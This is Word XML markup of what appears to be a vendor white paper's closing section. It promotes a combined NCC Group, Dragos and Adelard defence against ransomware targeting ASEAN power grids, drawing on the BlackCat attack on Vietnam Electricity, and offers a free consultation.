      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement zero-trust architecture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for contractors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395">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy deception technology</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SCADA networks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396">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish regional threat sharing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework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397">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct supply chain security audits</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w7ts8fog311" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_puzqqbydo2u4" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Response Capability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The combination of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard AESOP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides comprehensive defense against sophisticated ransomware campaigns targeting ASEAN energy infrastructure </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref101">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[101]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_10n6cw4936lf" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ASEAN Grid Security Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Regional interconnection vulnerability analysis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39F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Multi-national coordination for cross-border incidents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3A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Contractor vetting and monitoring frameworks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3A1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xl997dfufth7" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BlackCat Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Purpose-built analytics for ALPHV affiliate TTPs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3A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 61850 Monitoring</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Protocol-specific threat detection </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref106">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[106]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Neighborhood Keeper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Regional threat intelligence sharing </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref107">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[107]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qtxl29xm48fl" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety-Security Integration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grid Stability Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cyber impact on frequency regulation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref108">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[108]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cascading Failure Modeling</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cross-border grid dependencies </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref109">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[109]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery Prioritization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Safe grid restoration procedures </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref110">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[110]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9u1g7qp9hlw5" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Competitive Advantage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For ASEAN energy infrastructure protection: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only solution with IEC 61850 protocol expertise at scale </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref111">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[111]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proven experience with cross-border grid incidents </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref112">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[112]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration with ASEAN Power Grid planning initiatives </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref113">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[113]</w:t>
        </w:r>
      </w:hyperlink>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ckewj4k9oktb" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expert Consultation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8neuow9dt858" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">15-Minute Assessment Opportunity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With BlackCat affiliates continuing operations under new groups like RansomHub and STORMOUS, we offer a complimentary 15-minute consultation to assess your exposure to evolving ransomware threats.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Assessment Focus Areas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Third-party access to SCADA networks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell logging and WMI monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-border grid interconnection security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ASEAN threat intelligence integration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Immediate Value Delivered</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify contractor access vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detect PowerShell Empire indicators</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Map IEC 61850 device exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regional threat correlation insights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Contact our ASEAN energy security team: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">asean-energy@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or +65-XXXX-XXXX</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2ylajzpxzb6o" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The BlackCat/ALPHV attack on Vietnam Electricity serves as a stark warning for the entire ASEAN region. As nations pursue grid modernization and cross-border interconnection, the security of these systems becomes paramount for regional prosperity. The compromise of EVN—affecting 9 million residents and threatening critical water and food infrastructure—demonstrates that energy security is inseparable from human security.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While law enforcement actions disrupted BlackCat's infrastructure, the group's sophisticated affiliates have dispersed to new ransomware operations, taking their knowledge of energy sector vulnerabilities with them. The 84 data samples stolen from EVN likely contain operational intelligence that could facilitate future attacks across the interconnected ASEAN grid.</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As we work to ensure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protecting our regional energy infrastructure from ransomware becomes essential to Southeast Asia's sustainable development. The tri-partner solution offers the only comprehensive defense combining energy sector expertise, regional threat intelligence, and safety-security integration necessary for this critical mission.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rPr/>
      </w:pPr>
